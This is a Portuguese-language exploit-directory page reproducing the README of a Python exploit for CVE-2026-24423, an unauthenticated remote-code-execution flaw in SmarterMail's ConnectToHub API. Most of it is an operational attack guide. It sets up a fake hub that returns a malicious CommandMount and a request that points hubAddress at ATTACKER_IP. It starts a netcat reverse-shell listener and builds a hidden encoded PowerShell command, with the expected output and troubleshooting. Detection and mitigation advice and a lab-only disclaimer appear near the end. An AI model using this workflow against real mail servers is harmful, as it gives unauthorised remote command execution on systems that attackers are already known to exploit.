Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SmarterMail-CVE-2026-24423- — Exploit para CVE-2026-24423 — uma RCE crítica não autenticada na API ConnectToHub do SmarterMail. Afeta todas as versões anteriores à 9511. | Kitploit
Ferramentas/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423-
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubcyberalp0/smartermail-cve-2026-24423-

SmarterMail-CVE-2026-24423-

Exploit para CVE-2026-24423 — uma RCE crítica não autenticada na API ConnectToHub do SmarterMail. Afeta todas as versões anteriores à 9511.

Ver Repositório
há 14h 52mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SmarterMail ConnectToHub RCE

Um exploit baseado em Python para CVE-2026-24423, uma vulnerabilidade de Execução Remota de Código não autenticada na funcionalidade ConnectToHub do SmarterTools SmarterMail.

Uso pretendido: Apenas testes de segurança autorizados, CTFs, laboratórios Hack The Box e ambientes de pesquisa controlados.


Índice

  • Visão Geral
  • Detalhes do CVE
  • Versões Afetadas
  • Descrição da Vulnerabilidade
  • Detalhes Técnicos
  • Fluxo de Exploração
  • Requisitos
  • Configuração
  • Uso
  • Saída Esperada
  • Solução de Problemas
  • Capturas de Tela
  • Estrutura do Projeto
  • Mitigação
  • Referências
  • Aviso Legal

Visão Geral

CVE-2026-24423 é uma vulnerabilidade de Execução Remota de Código não autenticada que afeta o SmarterTools SmarterMail.

A vulnerabilidade existe na funcionalidade ConnectToHub. Um atacante não autenticado pode fornecer um hubAddress malicioso, fazendo com que o servidor SmarterMail realize uma solicitação HTTP para um servidor controlado pelo atacante.

O servidor malicioso responde com uma resposta setup-initial-connection manipulada contendo um valor SystemMount.CommandMount controlado.

A instância vulnerável do SmarterMail subsequentemente processa esse valor como um comando do sistema operacional, permitindo a execução arbitrária de comandos no contexto de segurança do serviço SmarterMail.

A vulnerabilidade recebeu uma pontuação CVSS 4.0 de 9.3 (Crítica) e é classificada como CWE-306: Ausência de Autenticação para Função Crítica.


Detalhes do CVE

CampoValor
CVECVE-2026-24423
FornecedorSmarterTools
ProdutoSmarterMail
VulnerabilidadeExecução Remota de Código não autenticada
CWECWE-306
CVSS v4.09.3 Crítico
CVSS v3.19.8 Crítico
Vetor de AtaqueRede
AutenticaçãoNenhuma
Interação do UsuárioNenhuma
ComplexidadeBaixa
Publicado23 de janeiro de 2026
Build Corrigido9511

O registro oficial do CVE descreve o problema como um RCE não autenticado através do método de API ConnectToHub.


Versões Afetadas

As versões do SmarterMail anteriores ao Build 9511 são afetadas.

O registro do CVE especifica o intervalo afetado como:

root@kitploit:~
SmarterMail < 100.0.9511

O Build 9511, lançado em 15 de janeiro de 2026, contém a correção do fornecedor.

Vulnerável

root@kitploit:~
< 100.0.9511

Corrigido

root@kitploit:~
>= 100.0.9511

Sempre verifique o build exato instalado antes de tentar reproduzir a vulnerabilidade.


Descrição da Vulnerabilidade

A funcionalidade vulnerável é exposta através da API de administração do sistema SmarterMail.

A operação relevante é:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

O endpoint aceita um parâmetro hubAddress.

Conceitualmente, um atacante pode fornecer:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

O SmarterMail então se conecta ao endereço de hub fornecido e solicita:

root@kitploit:~
/web/api/node-management/setup-initial-connection

O servidor controlado pelo atacante responde com JSON contendo um objeto SystemMount malicioso.

A propriedade importante é:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

O valor CommandMount é subsequentemente usado pelo aplicativo vulnerável como um comando do sistema operacional.

Isso permite que um atacante faça a transição de:

root@kitploit:~
Solicitação HTTP não autenticada

para:

root@kitploit:~
Execução remota de comandos

A análise técnica da VulnCheck confirma que o hubAddress controlado pelo atacante faz com que o SmarterMail solicite o endpoint setup-initial-connection do atacante e que o CommandMount retornado pode fornecer execução arbitrária de comandos.


Detalhes Técnicos

O exploit consiste em dois componentes:

1. Hub Falso do SmarterMail

O servidor Python escuta por:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

e retorna uma resposta JSON manipulada contendo o SystemMount.CommandMount malicioso.

2. Listener de Reverse Shell

Um listener TCP separado recebe a conexão iniciada pelo comando executado no alvo.

Este exploit usa intencionalmente duas portas separadas.

root@kitploit:~
8081
└── Hub Falso do SmarterMail

4455
└── Listener de Reverse Shell

Fluxo de Exploração

root@kitploit:~
flowchart LR

    A[Atacante<br/>10.10.14.50]

    H[Hub Falso do SmarterMail<br/>TCP/8081]

    T[Alvo SmarterMail<br/>10.129.57.86]

    C[CommandMount<br/>Execução de Comando]

    P[PowerShell]

    L[Listener de Reverse Shell<br/>TCP/4455]

    A -->|Acionar ConnectToHub| T
    T -->|HTTP POST| H
    H -->|JSON Malicioso| T
    T -->|CommandMount| C
    C --> P
    P -->|TCP Reverso| L
    L --> A

Conexão 1 — Hub Falso

root@kitploit:~
Alvo
   |
   | HTTP
   v
10.10.14.50:8081

Conexão 2 — Reverse Shell

root@kitploit:~
Alvo
   |
   | TCP
   v
10.10.14.50:4455

Essas portas servem a propósitos diferentes e não devem ser confundidas.


Requisitos

  • Python 3
  • Máquina atacante Linux
  • VPN Hack The Box ou rede autorizada equivalente
  • Conectividade de rede do alvo para o atacante
  • Netcat
  • Instalação vulnerável do SmarterMail

O exploit usa apenas módulos da biblioteca padrão do Python:

root@kitploit:~
http.server
json
base64

Nenhum pacote Python externo é necessário.


Configuração

Edite as seguintes variáveis:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

Para o ambiente HTB de exemplo:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST é o endereço IP do atacante que o alvo pode alcançar.

Para Hack The Box, este é normalmente o IP atribuído à interface VPN do HTB:

root@kitploit:~
ip addr show tun0

Exemplo:

root@kitploit:~
tun0:
    inet 10.10.14.50

Portanto:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT é a porta TCP usada pelo atacante para receber a conexão reversa.

Exemplo:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT é a porta HTTP usada pelo hub malicioso do SmarterMail.

Exemplo:

root@kitploit:~
HUB_PORT = 8081

Uso

1. Clone o repositório

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. Configure o exploit

Edite:

root@kitploit:~
nano exploit.py

Defina:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. Inicie o listener de reverse shell

Abra um terminal:

root@kitploit:~
nc -lvnp 4455

Esperado:

root@kitploit:~
Listening on 0.0.0.0 4455

Mantenha este terminal aberto.


4. Inicie o hub malicioso

Abra um segundo terminal:

root@kitploit:~
python3 exploit.py

Se a vinculação à porta selecionada exigir privilégios elevados:

root@kitploit:~
sudo python3 exploit.py

Saída esperada:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. Acione o ConnectToHub

Envie a solicitação apropriada para a instância vulnerável do SmarterMail.

O hubAddress fornecido deve apontar para o servidor HTTP malicioso:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

O valor importante é:

root@kitploit:~
http://10.10.14.50:8081

Não use a porta do reverse shell como porta do hub.


Resumo da Configuração de Portas

PropósitoIPPorta
VPN do Atacante10.10.14.50—
Hub Falso do SmarterMail10.10.14.508081
Reverse Shell10.10.14.504455
Alvo HTB10.129.57.86—

O fluxo resultante é:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
CommandMount Malicioso
    ↓
PowerShell
    ↓
10.10.14.50:4455

Codificação do Payload

O exploit cria dinamicamente o payload do PowerShell.

O parâmetro -EncodedCommand do PowerShell espera que o comando seja codificado usando UTF-16LE antes da codificação Base64.

O script executa:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

O comando final é estruturado como:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

Isso evita a codificação manual do payload e previne erros comuns de codificação UTF-8/UTF-16LE.


Saída Esperada

Quando o alvo alcança o hub malicioso:

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

O listener de reverse shell deve subsequentemente receber uma conexão:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

Uma vez conectado, a validação básica pode ser executada:

root@kitploit:~
whoami
root@kitploit:~
hostname

Solução de Problemas

O hub falso não recebe conexão

Verifique se o servidor está escutando:

root@kitploit:~
ss -lntp | grep 8081

Verifique o endereço VPN:

root@kitploit:~
ip addr show tun0

Confirme que LHOST corresponde ao endereço alcançável a partir do alvo.


O hub falso recebe HTTP 200 mas sem shell

Uma solicitação HTTP bem-sucedida significa que o primeiro estágio está funcionando:

root@kitploit:~
Alvo
  |
  | HTTP
  v
Hub Falso :8081

Isso não significa necessariamente que o segundo estágio foi bem-sucedido.

Verifique:

root@kitploit:~
ss -lntp | grep 4455

Certifique-se de que o Netcat foi iniciado antes de acionar o exploit.

Também verifique:

root@kitploit:~
LHOST = IP do atacante alcançável pelo alvo
LPORT = porta do listener

O Netcat recebe a solicitação HTTP em vez de um shell

Se você vir:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

dentro do Netcat, você apontou o hubAddress para o listener de reverse shell.

Incorreto:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

Correto:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

As duas portas devem permanecer separadas.


Resposta HTTP 400

Uma resposta 400 pode ocorrer quando o hub falso não retorna a estrutura esperada pelo SmarterMail.

Verifique se a resposta contém:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

Também certifique-se de que o caminho solicitado seja exatamente:

root@kitploit:~
/web/api/node-management/setup-initial-connection

A análise pública da vulnerabilidade identifica este endpoint como parte do fluxo vulnerável do ConnectToHub.


Capturas de Tela

Adicione capturas de tela do laboratório HTB aqui.

1. Enumeração do Alvo

Exemplo:

root@kitploit:~
![Enumeração Nmap](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/nmap.png)

Captura de tela sugerida:

  • Resultados do Nmap
  • Serviço/versão do SmarterMail
  • Porta exposta relevante

2. Hub Malicioso

root@kitploit:~
![Hub Falso](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/fake-hub.png)

Mostre:

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. Acionamento do Exploit

root@kitploit:~
![Solicitação Burp](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/burp-request.png)

Mostre a solicitação contendo:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. Reverse Shell

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/reverse-shell.png)

Mostre:

root@kitploit:~
Connection received on 10.129.57.86

e o prompt de comando resultante.


Estrutura do Projeto

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

Detecção

Indicadores potenciais de exploração incluem solicitações inesperadas para:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

e conexões de saída do servidor SmarterMail para hosts HTTP anteriormente desconhecidos.

Os administradores também devem revisar os logs de aplicação, IIS/reverse-proxy e rede para atividade suspeita do ConnectToHub.

O CVE-2026-24423 foi incluído no catálogo de Vulnerabilidades Exploradas Conhecidas da CISA, indicando que a exploração foi observada fora de ambientes de laboratório.


Mitigação

A remediação primária é atualizar o SmarterMail para o Build 9511 ou posterior. O lançamento do fornecedor em 15 de janeiro de 2026 corrigiu a vulnerabilidade.

Onde a aplicação imediata de patches não for possível, as organizações devem adicionalmente considerar:

  • Restringir o acesso às APIs administrativas do SmarterMail.
  • Prevenir acesso externo desnecessário aos endpoints de gerenciamento.
  • Aplicar segmentação de rede.
  • Monitorar conexões de saída do servidor SmarterMail.
  • Revisar logs históricos para solicitações suspeitas de ConnectToHub.
  • Investigar execução inesperada de comandos pela conta de serviço do SmarterMail.

Referências

  • Registro CVE: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub RCE Não Autenticado
  • CODE WHITE: Lista Pública de Vulnerabilidades
  • Notas de Lançamento do SmarterTools SmarterMail
  • Catálogo de Vulnerabilidades Exploradas Conhecidas da CISA

Aviso Legal

Este projeto é fornecido apenas para pesquisa de segurança autorizada e fins educacionais.

Não use este exploit contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.

O autor não assume nenhuma responsabilidade por uso indevido, danos, perda de dados, acesso não autorizado ou outras consequências resultantes do uso deste software.

Use apenas em ambientes controlados, como:

  • Hack The Box
  • Competições Capture-the-Flag
  • Laboratórios pessoais
  • Testes de penetração autorizados
  • Ambientes de pesquisa de segurança

Créditos

O CVE-2026-24423 foi creditado a:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

O CVE foi publicado pela VulnCheck em 23 de janeiro de 2026.

Baixar ferramenta